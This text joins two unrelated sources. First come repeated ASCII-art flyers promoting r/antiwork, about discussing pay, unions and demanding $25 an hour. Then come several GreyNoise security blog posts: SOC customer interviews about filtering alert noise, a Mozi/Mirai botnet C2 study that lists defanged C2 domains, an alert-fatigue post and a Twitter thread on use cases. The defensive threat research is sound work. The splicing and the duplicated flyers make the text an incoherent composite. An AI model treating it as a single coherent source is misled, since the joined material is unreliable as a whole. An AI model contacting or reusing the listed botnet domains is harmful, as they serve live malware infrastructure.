reddit.com/r/antiwork
=====================
----------------------------------------------------------

HOW TO SCARE A SLAVE OWNER:

1. Talk about your PAY
2. Talk about your RIGHTS
3. Talk about FORMING A UNION

Employers are not scared of
these, but SLAVE OWNERS are.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
quitting and finding a different job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------
:::::::::::::::::::::::::::::::
::::: TIME IS :::::::::::::::::
::::::: YOUR MOST :::::::::::::
:::::::::: VALUABLE ASSET :::::
:::::::::::::::::::::::::::::::

Not only can you never
obtain any more of it,
you do not even know how
much you have to begin with.

LIFE IS SHORT!

Why are you selling YOUR TIME
for SO LITTLE?

Join the "25 OR WALK" movement!

Tell your employer that YOUR
TIME is worth no less than
$25 per hour, and for them
to call you when they are
ready to pay up.

But DON'T QUIT!

MAKE THEM FIRE YOU!

... and spend YOUR TIME
...... with FAMILY

... and spend YOUR TIME
...... with FRIENDS

... and rediscover YOUR
...... FAVORITE HOBBY

... AND RECLAIM YOUR LIFE

POVERTY WAGES only existed
because people were "willing"
to work for them.

BUT NOT ANYMORE.

THIS. ENDS. NOW.


Learn More:
=====================
reddit.com/r/antiwork
=====================

----------------------------------------------------------
ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
=====================
----------------------------------------------------------

==========================
ABUSIVE EMPLOYER CHECKLIST
==========================

[ ] Can't talk about PAY
[ ] Can't talk about RIGHTS
[ ] Can't talk about UNIONS
[ ] Punished for getting SICK
[ ] Punished for taking VACATION

If your employer checks ANY of
these, please contact support:

reddit.com/r/antiwork
----------------------------------------------------------



ARE YOU BEING UNDERPAID?


You have a legal, protected right to
discuss your pay with your coworkers.

This should be done on a regular basis to
ensure that everyone is being paid fairly.

It is ILLEGAL for your employer to punish
you for doing this.

If you learn that you are being paid less
than someone else who is doing the same
job, you should demand a raise or consider
getting fired and finding a better job.

SLAVE WAGES only exist because people are
willing to work for them.


Learn More:
=====================
reddit.com/r/antiwork
====================

----------------------------------------------------------



==============
RIDDLE ME THIS
==============

How can the McDonald's
in Denmark pay their staff
$22 an hour and still manage
to sell a Big Mac for
less than in America?

Answer: UNIONS!


A GOOD UNION can easily
align everyone's goals.

Did you know that it
is a rather simple task
to organize a UNION?


Learn More:
=====================
reddit.com/r/antiwork
=====================

XSOAR Incident Response in the SOC with GreyNoise

You’re in a dark room, and your screen is crawling with alerts from your IDS/IPS about an IP address trying an exploit on one of your internet-facing devices. You scramble to investigate the event, checking VirusTotal, IPinfo, Whois, and even Google to try to figure out how dangerous the IP might be, only to figure out after an hour that it's actually just Shodan… or Censys… or Pingdom… or a brain-dead bot script.

GreyNoise recently met with Robert*, Manager of Cybersecurity Incident Response & Operations at a large food service & hospitality company. Robert lives this reality every day as he and his Incident Response team respond to network events from their MSSP and internal detections. Recently Robert found a way to leverage GreyNoise Intelligence data integrated into Cortex XSOAR incident response to help his team answer these questions much more quickly and effectively. We caught up with Robert recently to learn how he had done it.

* Customer names have been changed to maintain anonymity

Using GreyNoise to prioritize threats with XSOAR Incident Response

GreyNoise(GN): Thanks for joining us, Robert. Tell us a bit of your background?

Robert: Sure — I lead the incident response and security operations team at my company. I've been here for about six years and was previously an individual contributor on a joint team that combined security engineering, incident response, and security operations.

A few years ago, we figured it probably doesn't make sense to keep this one giant team, and it would be nice to start developing some specialization. So we chunked the team into two groups — a security engineering team, and an incident response and security operations team. I was fortunate to be selected to run the new IR and Ops team, and I’ve been doing it for about two years now.

GN: Can you tell us more about what your teams are responsible for and how you work?

Robert: We work with several external partners that triage alerts for us, as well as conduct our own custom detections and investigations. We actually have four different alert classifications:

  • User reported - these are things like suspected phishing emails, where an end-user is sending something to us.
  • Partner alerts - we've got three major partners that look at events and raise alerts to us:
  1. EDR/endpoint incidents
  2. Cloud-native and SaaS type incidents
  3. Traditional IPS/IDS incidents raised by our MSSP (these partners will raise alerts in their ticketing system, and then these get mirrored into our SOAR system for us to look at)
  • Black box alerts - we use a number of products internally, including things like AWS Guard Duty and Microsoft Cloud App Security, where we get alerts. We also process alerts based on our traditional AV signatures.
  • Custom detections - these are detections that we're doing through our SIEM or other tools where we specifically want to look for something.
GreyNoise XSOAR Incident Response Quadrant - Robert

So basically, we use our MSSP partner as Tier 1 analysts, with my teams handling Tier 2 and above. We're not a 24x7 shop, so we push 24x7 monitoring of our assets to our partners, basically saying, “Here's your escalation plan during business hours; here's your escalation plan outside of business hours. Go get them.”

Once we get an alert through any of these sources, we'll do triage, and beyond the initial triage, we’ll do remediation, and then resilience. Any kind of gaps that we have in those tools, we supplement with our own detections, or if it's a use case that’s specific to the company, we'll do it internally as well.

GN: What was it that drew you to GreyNoise?

Robert: I remember seeing Andrew [Morris, founder and CEO of GreyNoise] talking about it on Twitter, and I checked it out and thought, wow, this is really awesome. I think the biggest sort of “aha” for me was looking at the amount of time it could save me during an investigation.

What was happening quite often to us was that we would get these IDS/IPS alerts about an exploitation attempt. And we’d have to run the alerts to the ground, and it was taking forever.

I realized, looking at GreyNoise, that this tool would tell me if this is a targeted attack or if it’s a piece of automation that some attacker is using to try to build their botnet. Because if it's an automated attack, and the script fails even slightly, then the whole attack is probably a wash at that point. There's not an operator with hands-on-keyboard to make the adjustments needed, so the automation just fails and moves on to the next IP.

Having that kind of insight was a game-changer for us in how we analyzed those alerts and how we looked at that type of attack surface. So we started using the Community edition of GreyNoise with our old homegrown incident response tool to query things, and it was tremendously helpful.

For example, one of the things we were looking at was vulnerability scans. If we’re getting vulnerability scanned by somebody who’s scanning everybody else too, okay, welcome to the Internet. But if somebody’s scanning us that GreyNoise has never heard of, that's interesting — why are they just scanning us? Are we being targeted? GreyNoise majorly short-cycled a lot of investigations on these kinds of events.

Another example, we would see somebody slinging an Apache Struts exploit. Okay, are they doing this just to us, or are they doing this to everybody? And again, that kind of changed the dynamic of how we responded to that event.

GN: How are you using GreyNoise today?

Robert: A while back, we started to look at various SOAR platforms, and I ended up doing evaluations of what was then Demisto (it’s Cortex XSOAR now), Splunk Phantom, Swimlane, and Siemplify. I engaged with the vendors, downloaded the software, ran an evaluation environment, and actually kicked the tires on each of them. Ultimately we landed on XSOAR, and that started the clock of bringing things over from our existing incident response queue.

As we started to bring events into XSOAR, particularly the ones where we had been using GreyNoise, I realized there was a great opportunity to integrate GreyNoise into XSOAR to automate the process. I went to my director and made the case that we've been using this tool called GreyNoise, and it's super helpful. Now that we've got these events coming from our MSSP into XSOAR, we could start leveraging automation to query GreyNoise, instead of having to manually copy the IP, open up a new tab, paste it in and run a search.

I had been talking to Andrew a fair amount on Twitter, and he sent me over an integration between GreyNoise and XSOAR (there was no marketplace at the time), and it worked really well. So we signed up for a paid plan with GreyNoise to get more IP lookups and more context information. We now use GreyNoise on most of our network detection-based alerts to give context and alleviate a lot of strain from a research perspective on those events. So it's been great.

The way we’ve integrated GreyNoise into XSOAR is that any time we see an IP address, XSOAR invokes the IP enrichment command for every integration that supports it. This includes GreyNoise, Virus Total, IPinfo.io, whatever. It'll run them all, bring all that data back, and show it to the analyst. One of the areas where GreyNoise is really useful with this approach is inside of our playbook for the IDS/IPS alerts from our MSSP.

In addition to alerts coming from our MSSP, we do custom detections in our SIEM, Splunk Enterprise Security. So while we will write content in Splunk, and raise these as notable events in ES, all of the results get mirrored into XSOAR. We try to make XSOAR the “one-stop-shop” for every event that we’re working.

GN: What are some of the top use cases where you are getting value from GreyNoise?

Robert: Just being able to tell the background noise of the Internet, that was huge for us and made us go “wow.” To see that this activity is just a consequence of being online, but that activity over there GreyNoise hadn't seen, so they're only paying attention to us, and it actually merits us looking into more deeply because they're not just slinging exploits or vulnerability scans at every IP address on the Internet. And we've also seen the opposite, where we see yes, they are a benign scanner, and it's Shodan, cool, we can ignore it.

Because GreyNoise is good at providing context around what IPs are doing in the broader Internet, it typically plays a lot with the IDS/IPS stuff that our MSSP handles — the primary data that we pivot off of for these events is the IP address. We also use GreyNoise on an ad hoc basis — for example, if I see a weird IP on a login to our identity provider, I’ll look it up in GreyNoise and see if it does anything funky on the Internet. And so it's often just helpful context.

Another use case that’s been really helpful is the new RIOT tagging, which identifies known legitimate traffic. For example, if I'm doing an investigation on a host that's been compromised and I've got a list of IPs it's talked to in the last 24 hours, I just want to rip out all the stuff that is legitimate, like Office 365 or Slack or cloud solutions that our users should be talking to. I can go to the analysis page on GreyNoise and just drop this big block of IPs in there, and it will tell me if any of these are ones that I should really be caring about, and help me eliminate the ones that I don’t. It gives me a good way to filter for a first pass — I can rule this stuff out for now and focus on what's left. Then if I still can't find anything, I can go back to the Office 365 IP and look for anomalies there. Because If there's an Eastern European IP address buried in amongst the Office 365 ones, I know which one I want to look at first.

GN: How do you think about the “opportunistic scanners” you see through GreyNoise?

Robert: Every time we find an IP that GreyNoise knows about, we ask ourselves, “Hey, is this IP trying to exploit CVE fill-in-the-blank here? Do we run that software? No? OK, done.” Because it's an opportunistic scanner, and GreyNoise is saying the IP is focused on this particular CVE, or it loves these six CVEs for this product suite. This allows us to conclude that, because we don't use that product suite, we're good, and we can ignore it.

Alternatively, the answer might be, “yes, we do use that product suite.” In that case, I’ll go read about the CVE and see what versions are vulnerable, and then look at our system and see if it’s something we need to dig into or whether we already patched for it.

As part of our triage, we also check in with our vulnerability management team. If we see a scanner out on the Internet scanning through our IPs, we’ll go dig up our internal scan results for the same IP and see what we found. Because we can pretty much know that anything we found, the bad guys just did too.

There’s some nice visibility we get with GreyNoise around vulnerability scans. For example, for events that we get, we can look at our firewall and easily see that this particular IP scans all of these public IPs. Then we can check in GreyNoise to see, what ports does this scanner like to scan? We obviously know they scan port 80 because that's why we're here. But do they scan 443 (SSL)? Recently Andrew tweeted about some new behavior GreyNoise tracks looking at whether scanners follow 301 or 302 redirects.

Say we determine that this IP only scans port 80 — cool. Now we can go into XSOAR and CURL all of the IPs that they scanned on port 80 and check to see if there’s a common vulnerability they might be looking for. Or do we get our load balancer telling them they need to go to 443? Because if we get that, and this IP doesn’t follow redirects, and this IP doesn't scan 443, then he's hitting a load balancer appliance, and I don't care. In XSOAR, that playbook will close the event if this is the condition that's met. And no analyst ever has to interact with this event.

GreyNoise Mass Internet Scanning
Three Types of Mass-Internet Scanning

GN: What kind of impact has GreyNoise had on your business — can you share any results?

Robert: I remember first seeing Andrew talking about GreyNoise on Twitter. When I checked it out, I thought, wow, this is really awesome. I think the biggest sort of “aha” for me was looking at the amount of time it could save me during an investigation.

We started using the GreyNoise Community edition with our old homegrown incident response tool, and it was tremendously helpful. That experience allowed me to go to my director and make a case for leveraging automation to query GreyNoise, instead of having to manually copy the IP, open up a new tab, paste it in and run a search. Today we use GreyNoise on most of our network detection-based alerts, and to enrich every event we get from our MSSP. I would estimate that GreyNoise is saving us probably an hour of work every time we get one of these vulnerability scan events — we’ve automated our approach completely, so an analyst doesn’t even have to touch it (and we see around 8-10 of these events every week). So long story short, GreyNoise really does shorten the cycle of some of these vulnerability scan investigations and is saving us about 40 hours per month that we can apply to other high-priority security problems.

I’m also getting some good value out of using GreyNoise for ad hoc investigation context help — for example, when I've got a bunch of IPs and I just want to filter out the ones that I don't need to care about. We use GreyNoise to give context and alleviate a lot of strain from a research perspective on those events. So it's been great.

Curious how GreyNoise can save your SOC time? Try the product for free.

Get Started With GreyNoise For Free

A Thank You to SOC Analysts

Wednesday, October 20, 2021, is the first ever SOC Analyst Appreciation Day™ - and in our opinion, it couldn’t have come sooner! We’d like to acknowledge the hard work and dedication of all the SOC analysts who help defend institutions across the globe. Thank you.

A SOC analyst’s life can be frustrating and stressful, with the weight of your organization’s security on your shoulders. Our goal here at GreyNoise is to help make your life easier by increasing SOC analyst efficiency, and by telling teams what not to worry about. We do this by helping you filter out “noisy” alerts associated with opportunistic internet scanning or common business services, not targeted threats. SOC teams can use GreyNoise data by using our web-based Visualizer, accessing our API via REST, SDK, or CLI, or integrating directly with your security tech stack.

If you’re a SOC analyst or manager interested in learning more about how you can use GreyNoise

  1. Reach out to community@greynoise.io to get free access to GreyNoise Enterprise for 1 month.
  2. Check out the following resources:

Case Study: Hurricane Labs

  • How Hurricane Labs Reduces Noisy Alerts in Splunk and Phantom Using GreyNoise

How I Use GreyNoise

  • Session II Paul Misner & Grant Lorello, SecuLore (MSSP Provider)

How Hurricane Labs Reduces Noisy Alerts in Splunk and Phantom Using GreyNoise

Imagine this scenario: You’re running a security operations center, and your team is processing a bunch of alerts coming out of Splunk Enterprise Security. As you add new detections and log sources, the volume of alerts begins to rise, your analysts start to get overwhelmed, and that familiar alert fatigue starts to kick in. Your security engineering team jumps in with yet another cycle of tuning to get the alert volumes back down to manageable levels. Then the cycle starts all over again...

Hurricane Labs lives this reality every day as a managed services provider that is 100% focused on Splunk and Phantom. The company manages these platforms for customers, providing 24x7 monitoring services supported by a team of Splunk ninjas to handle the heavy lifting.

Recently the Hurricane team found a way to leverage GreyNoise Intelligence data to identify the noise in Splunk and Phantom alert traffic, reducing the load on their analysts by 25%.

We had the good fortune to chat with Hurricane Labs Director of Managed Services, Steve McMaster, to learn how the company had done it.

GreyNoise: Thanks for joining us, Steve. Perhaps we could start off with a bit of your background - how did you get started with Hurricane Labs?

STEVE MCMASTER: Sure - to set the stage, we manage Splunk and Phantom deployments for our customers, running the gamut from infrastructure management, to search and SPL creation, to security analysis and alerting, to rapid incident response. As part of these services, we provide 24x7 security monitoring, and I oversee the two teams that deliver this service. I’ve been with Hurricane for almost 14 years at this point - it's actually the only job I've ever had. I started here at age 17, right out of high school, and along the way, I've done a little bit of everything.

GN: What kind of challenges were you and your teams at Hurricane facing around your managing security alerts?

STEVE MCMASTER: We process a high volume of alerts on behalf of our customers, and as part of this traffic, we often see a lot of noisy alerts. This includes everything from known benign scanners (such as Shodan) to what we call "internet background noise," scanners that are constantly scanning the internet as a whole, looking for things to poke at.

The alert volumes we see are a constant ebb and flow, and we spend a lot of time tuning our customer’s environments to turn down the noise to a manageable level. But then, as we add new customers and more detections, the alert volumes start to creep back up. That’s when we see our analysts getting overwhelmed and feeling alert fatigue. It’s a normal cycle for our business, alert volumes go up, and then we need to dig in and tune our implementations to bring the volumes back down.

GN: What was it that drew you to GreyNoise?

STEVE MCMASTER: We were starting a new cycle of tuning to get alert volumes to come back down when I stumbled on Andrew [Morris, GreyNoise founder]. I saw my boss and Andrew exchanging views on Twitter, and I thought, “Who is this guy, and why does the stuff he’s saying make so much sense?” So I took a look at the GreyNoise product.

I have to say, I’ve always been a big skeptic of threat intelligence as an industry because once enough people know about a piece of intelligence to publish it for general consumption, it’s already burned infrastructure. Yes, you might find some threats with it, but it's not worth the $150K per year that they charge for it.

But GreyNoise was different. I always refer to GreyNoise now as “anti-threat intelligence.” It’s specifically the opposite of traditional threat intelligence. Instead of saying, “pay attention to this,” GreyNoise says, “STOP paying attention to this; go spend your time on other things.”

So this approach fit into an argument I was having with our customers a lot at the time - my point was that the things that you’re detecting are not actionable. They’re not targeted at you; they’re not somebody trying to exploit you; they’re JUST scanning the internet. So you shouldn’t worry about them or spend time on them.

Shodan makes a really good example of this, because Shodan is scanning everybody and showing up in a lot of alerts. But this is not something YOU need to care about, Mr. Customer; therefore, it's not something WE need to care about as part of our monitoring service. The problem is that this is really hard to quantify. You can show people that alerts from Shodan should be ignored — that's easy, but trying to identify broader Internet background noise was a lot harder to do. To be able to say, “Okay, we've seen this thing across our 40 customers, so let’s ignore it,” that's not really enough scale to be able to make this conclusion definitively.

And then along came this guy who had a product that did exactly that. So GreyNoise let us expand our service in a way that customers kind of already expected from us. Now we could say, “Look, this is opportunistic, this is generalized, this is global, this is not targeted.” And we could say this definitively because of the scale that GreyNoise operates.

And it really just happened to fit at a time when that was a problem we were trying to tackle with our customers.

GN: So now, fast forward, how are you using GreyNoise with Splunk and Phantom today to deliver on this promise of “reducing the noise?”

STEVE MCMASTER: We’re using GreyNoise in two ways - we use the data inside Splunk to eliminate alerts before they ever get to us, and then we do enrichment of alerts in Phantom once they reach us. We integrate the GreyNoise data into these environments using pre-built integrations that we initially developed, although we have turned these over to GreyNoise to maintain and extend for all their customers.

Our goal with these integrations is that if the IP address is in GreyNoise, then we eliminate it from alerting. GreyNoise actually returns 3 basic categories of “noise:”

  1. an IP can be “known benign,” which is something I don't have to care about;
  2. any IP identified as “known malicious” is something I should be automatically blocking at the edge;
  3. and anything else (“unknown”) is when I want to stick a person on it to see what actually happened and what impact it had.

The reality is that some customers are not totally comfortable with the accuracy of these classifications (at least at first), so for some customers, we still raise a low-priority alert so they can have a human look at it. I think that this comes down to trust --and based on OUR experience-- if GreyNoise is confident the IP address is a scanner, then we are happy to ignore it. I would say about two-thirds of our customers are there today.

I’m also really excited about something Andrew mentioned at the last Open Forum conference GreyNoise held, the new RIOT service. Instead of identifying internet scanner “noise,” RIOT looks at the flip side of this by identifying the “known good,” common business services that everyone uses, like Slack or Office365, or Google IP addresses. So now we can easily tell the difference between a legitimate service like a Microsoft update and a "not legitimate" service like a malware download.

GN: Could you give us some more detail on how the implementations work?

STEVE MCMASTER: Sure, so when we use GreyNoise to filter noisy alerts out of Splunk, we use the GreyNoise-Splunk integration. We install that in our customer’s Splunk environment and add it to the search language for various detections. The logic is straightforward: if something in the search results matches GreyNoise, it gets excluded.

More specifically, we apply GreyNoise to any correlation search or detection inside of Splunk that we think is relevant. The big ones are IDS events and Splunk’s vulnerability scanner detection rules; those are the main ones that we use it for.

For Phantom, on the other hand, we use GreyNoise as an enrichment. The way our monitoring service works, we bring all of our customers’ alerts into a single Phantom instance, and we have the GreyNoise-Phantom integration installed. For our analysts looking at the alerts, one of the first things they do is look at the GreyNoise data. If the verdict is “noise,” then we know we don't need to do a lot more digging beyond that. This ends up saving us a lot of time because rather than investigating whether this is a targeted attack and figuring out whether anything was exploited, we can just short circuit the process, note it as a scanner, and send it over. Today we’re doing this as a manual process, but it's on our list to automate this into our incoming Phantom playbooks.

GN: What kind of impact has GreyNoise had on your business? Can you share any results?

STEVE MCMASTER: When I first told Andrew that we'd be interested in subscribing, I told him I had no concept of how much something like this would be worth. I didn’t know if we were going to turn this on and see matches with 10 alerts per day across our customers or 100. But the impact on alerts is really the only thing I had to help quantify the value of GreyNoise.

So Andrew gave us a two week trial, and I added it to our triage tool (this was before we stood up Phantom). And I just counted up how many alerts over a week would have been something we could totally ignore with GreyNoise versus what we would not have been able to. We were somewhere in the vicinity of saving the equivalent of one to one and a half analysts per day, out of 22 total analysts at the time, based on the alerts that we could safely eliminate with GreyNoise.

Today, after implementation and with more customers in hand, GreyNoise helps my teams eliminate background noise and focus on the most actionable and relevant alerts for our customers. Rather than presenting our analysts with even more data to investigate, GreyNoise has allowed us to reduce the volume of alerts that are triggered by 25%, which makes for a happier and more effective SOC team.

And for us as an MSSP, this is even more significant than it might be for an enterprise. When you’re in a normal enterprise business, you can make a decision to spend money on a person or spend money on a product that eliminates alerts--you kind of have to pick your poison. But for us, the calculus is a bit different. When we invest in a person, that analyst can do, say, 20 alerts per day. But if we invest in a product, that product can triage a certain number of alerts at every one of our customers. And for every new customer, it can repeat that work. So even if GreyNoise could only eliminate 8 alerts per day across 40 different customers, that’s 320 alerts. As we add more customers, GreyNoise scales in a way a person wouldn’t.

GET STARTED FOR FREE

Mozi-ing around C2s with Black Lotus Labs

GreyNoise sees a lot of botnet activity, both benign and malicious, through our fleet of global sensors. We enlisted Black Lotus Labs®, the threat research arm of Lumen, to help us bring you more information about these botnets and their Command and Control (C2) hosts. A botnet’s C2, as the name implies, is a host from which bots receive their commands, download malicious files, and/or simply report back. Effectively, the C2 is the brain of the operation, and without one, a bot may simply sit dormant.

Black Lotus Labs' mission is to find and disrupt C2s to make the internet a cleaner and safer place. The amount of noise generated by these botnets, driven by their C2s, is astounding. For example, check out the traffic for May just for the Mozi botnet:

Figure 1: Volume of netflow records  associated with known Mozi botnet IPs observed  by Black Lotus Labs for the month of May, 2021.
Figure 1: Volume of netflow records associated with known Mozi botnet IPs observed by Black Lotus Labs for the month of May, 2021.

Some reports estimate that bots generate 25% of all internet traffic. This reflects what we see at GreyNoise - for example, on any given day, we tag around 30k IPs as ‘Mirai’ or ‘Mirai Variant,' one of the most prevalent bots in the wild. We are always looking for ways to identify sources of internet noise, so hunting botnets and their C2s with the Black Lotus Labs team was a natural fit.

Identifying C2s Using Graph Analysis

To kick off our project, Black Lotus Labs enriched their netflow data using IPs tagged as ‘Mirai Variant’ in GreyNoise and applied some basic graph algorithms to identify a list of potential C2 IPs. These algorithms mapped 23 suspected C2 IPs in Black Lotus Labs’ data that communicated the most with several hundred GreyNoise ‘Mirai Variant’-tagged IPs. This one-to-many relationship is indicative of a traditional C2. Some of the potential C2 IPs in Black Lotus Labs’ data were previously identified Mirai C2s, but, interestingly enough, others were identified as a botnet family known as Mozi, a newer family that eschews the traditional C2 model.

Figure 2: Potential C2 determined by a one-to-many relationship to tagged bots.
Figure 2: Potential C2 determined by a one-to-many relationship to tagged bots.

Mozi exhibits many of the characteristics of Mirai, with one major exception: it has no central C2. Instead, Mozi is a peer-to-peer (P2P) botnet where every infected host is both a bot and a C2. Each peer propagates configurations and hosts payloads while also performing bot duties such as participating in DDoS, scanning the internet, and exploiting hosts to expand the botnet. For more on Mozi and P2P botnet technology, check out Black Lotus Labs’ analysis.

Figure 3: Centralized botnet (left) vs P2P botnet (right)
Figure 3: Centralized botnet (left) vs P2P botnet (right)

Identifying C2s Using Request Analysis

From the GreyNoise side of the project, we decided to look at request payloads within scanner traffic to see if we could identify C2s. We observed that, despite their difference in centralization, botnets like Mirai and Mozi are both notorious for inserting C2 addresses (IPs or domains) into their initial exploit attempt. Typically these exploits will execute a script that fetches a malicious payload from the C2 address and initializes the bot.

If you’ve ever looked at traffic hitting your network perimeter, you have probably seen a request like this:

Figure 4: Example request with C2 IP.
Figure 4: Example request with C2 IP.

If you extract and check the IP, you might discover, unsurprisingly, that the host is a C2. That’s it. No advanced analytics. No machine learning. No blockchain. Just IP and domain extraction.

We decided to leverage this insight and test if this was an accurate way to identify P2P Mozi family C2s - that is, IPs that scan like a bot AND deliver peer-to-peer C2 addresses. Our approach was to extract a set of IPs matching this request pattern from our data and then compare the results with Black Lotus Labs C2 data.

Using this method, we compiled a list of 3,368 suspected C2 IPs that appeared to be delivering requests with embedded C2 addresses. Our free Analysis tool confirmed that 97% of these IPs scanned the internet within the last 90 days. So our hypothesis was that this combination of bot and C2 behaviors allows us to accurately identify P2P Mozi family C2s.

Figure 5: Potential C2s observed scanning by the GreyNoise Analyzer.
Figure 5: Potential C2s observed scanning by the GreyNoise Analyzer.

To test the hypothesis, we asked Black Lotus Labs to analyze the IP list and identify any C2s already known to them. They found that our list contained 962 IPs previously identified as C2s or botnet peers.

Figure 6: Left, percentage of IPs analyzed by Black Lotus Labs . Right, breakdown C2 families for the analyzed IPs.
Figure 6: Left, percentage of IPs analyzed by Black Lotus Labs. Right, breakdown C2 families for the analyzed IPs.

In total, 28% of our potential Mozi IPs were identified by Black Lotus Labs as C2s. Of those, 98% were confirmed as Mozi. So while this is a promising start at identifying suspected C2 IPs, it doesn’t provide conclusive evidence that IPs exhibiting this behavior belong to the Mozi family. Further research is required to profile the remaining 71%, which are most likely simple bots.

Identifying Vulnerabilities Using Extracted C2s

Why is it important to identify C2 IPs like Mozi? Using the confirmed C2 data in hand, we found we can now pivot around the addresses (both IPs and domains) to help identify the vulnerabilities being exploited. For example, take the following C2 domain:

bp65pce2vsk7wpvy2fyehel25ovw4v7nve3lknwzta7gtiuy6jm7l4yd[.]onion[.]ws

We found that more than 50% of traffic containing this C2 domain belonged to IPs, probably bots, exploiting the same three vulnerabilities: TerraMaster TOS (CVE-2020-28188), Zend Framework (CVE-2021-3007), and Liferay Portal (CVE-2020-7961).

The FreakOut botnet is known to exploit this unholy trinity. Although we already have tags for all three of these vulnerabilities, this demonstrates how we can use C2 addresses to automate the process of identifying and tagging known unknowns: vulnerabilities used by botnets.

Recall that bot traffic comprises almost a quarter of all internet traffic. Developing and expanding these techniques allow us to closely examine some of the most common noise on the internet. Any vulnerability checks or exploit used by a botnet like Mirai or Mozi is bound to be one of the most well used on the internet. By knowing botnets, we know noise.

Additionally, we want to refine and share these fun C2 addresses, like cnc[.]tacobelllover[.]tk, with our customers and community as a data feed for your projects, research, and work. If this interests you, create a GreyNoise account and join our Community Slack to give us feedback.

Some Thoughts On Fixing Alert Fatigue In The SOC

Please check out Andrew Morris' guest blog on IOActive

It turns out that alert fatigue is not unique to cybersecurity - who knew? Given the fact that alert overload is a problem across industries like healthcare, manufacturing, transportation, and utilities, you’d think that we in the cybersecurity industry would have some better tools and insights about how to handle it. Unfortunately, that’s not the case.

This is why Andrew Morris, founder and CEO of GreyNoise, pulled together his thoughts on the topic and shared them in a guest blog for IOActive. The post is titled “Cybersecurity Alert Fatigue: Why It Happens, Why It Sucks, and What We Can Do About It.” In the article, he covers the main contributing factors to alert fatigue for cybersecurity practitioners, the impact it has on analysts and SOC teams, and some thoughts about addressing the problems at multiple levels.

You know you might have an alert fatigue problem if any of these technical causes of alert fatigue sound familiar:

  • Overmatched, misleading, or outdated indicator telemetry
  • Legitimate computer programs doing weird things
  • Poor security product UX
  • Expected network behavior is a moving target
  • Home networks are now corporate networks
  • Cyberattacks are easier to automate
  • Activity formerly considered malicious is being executed at internet-wide scale by security companies
  • The internet is really noisy

And all of these factors are made worse by a SOC ecosystem that’s not set up for success. This includes vendors who sell on fear, build products that don’t play well with others, focus only on the signal (not the noise), and price their products in ways that drive them to raise as many alerts as possible. And SOCs are equally culpable, putting enormous pressure on analysts to catch every single attack in an environment where the alert volumes just keep growing, and half of them are false positives. Is it any wonder that security analysts exhibit serious alert fatigue and burnout, and that SOCs have extremely high turnover rates?

Please check out the blog post here to learn more about the causes of alert fatigue, why it sucks, and what we can do about it.

Get Started With GreyNoise for Free

GreyNoise Use Cases: Twitter Edition

Andrew Morris got on a roll the other day and whacked out this tweetstorm describing the three key use cases for GreyNoise. You can check out the original Twitter thread here. Enjoy!

I'd like to do an overview of the three most common use-cases to use  @GreyNoiseIO  for.   1. Ignore/deprioritize pointless telemetry or alerts in the SOC 2. Identify compromised systems 3. Track which vulnerabilities are being opportunistically exploited ITW  Thread (1/26)

1. Improve SOC efficiency

Benign IPs

Let's say I get a wacky IDS alert or am seeing something strange in my logs. I'll look up the IP address in GreyNoise (either using our visualizer or our free community API.

I looked up the IP address and, oh wow! It's just Shodan! GreyNoise already marked it as benign. No big deal. Paste a link in your ticket to the GreyNoise visualizer and move on.

https://viz.greynoise.io/ip/71.6.135.131

Example of GreyNoise Visualizer showing benign IP address detail

Maybe I don't want to use the GreyNoise web interface. Let's say I look up the IP in the free unauthenticated GreyNoise Community API and... cool, reports back that it's Censys. No problemo. Move on.

Example of GreyNoise Community API showing benign IP address detail

Malicious IPs

Let's say I look up an IP address, and it comes back with this big scary red IP address that says "malicious." What does this mean?

https://viz.greynoise.io/ip/45.155.205.165

Example of GreyNoise Visualizer showing malicious IP address detail

Well, this means that the IP is probably malicious (or was observed by GreyNoise doing something bad on our sensors), but whatever attack you're seeing is not targeted at *you specifically*. It was an opportunistic attack. Background noise.

Unknown IPs (to GreyNoise)

What if the IP address... doesn't come back at all?

This means that we've never seen that IP scanning/crawling the Internet, and it doesn't belong to any benign business services. It actually *might* be targeted your organization specifically. Investigate.

Example of GreyNoise Visualizer showing "No results found"

GreyNoise APIs

The GreyNoise Community API is rate limited to a few thousand lookups per day, but it's completely free and unauthenticated. As long as we continue to add enterprise customers and can afford to pay our staff and AWS bills, this will continue to be free.

Note that you don't get context, raw data, metadata, or tags using the Community API. Sorry folks, we've gotta make our money somewhere. This is available in our Enterprise API. If you want this data via API, hit up our sales team. But hey, it's free.

Fun fact: Just about every customer we have at GreyNoise sees at least a 20% alert contextualization/reduction rate from using GreyNoise. That's a LOT of wasted human hours spent chasing ghosts.

Analyze a List of IPs

Now let's say you've had an incident, and you need to figure out which of the gazillion IP addresses in some log file compromised your device.

No problemo. Just dump the log file (or just the IP addresses) into the GreyNoise analysis page, and now you can do two things:

  1. Quickly filter out known good guys
  2. If the situation warrants it, quickly identify opportunistic bad guys.

Here's an Analysis from an SSH auth.log I grabbed on a live server on the Internet.

~*~97.22% noise~*~

Example of GreyNoise Visualizer showing Analysis results

Filter Known-Benign Services (RIOT)

Let's say I'm trawling through a ton of netflow logs, and I want to identify any connections OUT of my network that might be going to bad guys.

I can filter known-benign services (Zoom, Github, Office365, Cloudflare, etc.). I can use GreyNoise RIOT for this.

Example of netflow log with a large number of IP addresses to triage
After analysis, just a handful of IP addresses are identified as "malicious" or "unknown"
Example of GreyNoise Visualizer showing RIOT IP address detail

*I'd like to note here that the IPs in RIOT *could potentially* be used by a sufficiently advanced adversary to attack you (async c2, etc.), but that doesn't mean that 99% of bad guys will be doing this, and it's not like you can just *BLOCK ZOOM* and not expect blowback.

Don't think of RIOT as a NACL or whitelist/allowlist. Think of RIOT as added context and a time-saver. You can either find out from GreyNoise via RIOT, or you can find out from your helpdesk reps when you block an IP and execs suddenly can't send emails anymore ¯\_(ツ)_/¯

2. Identify compromised devices

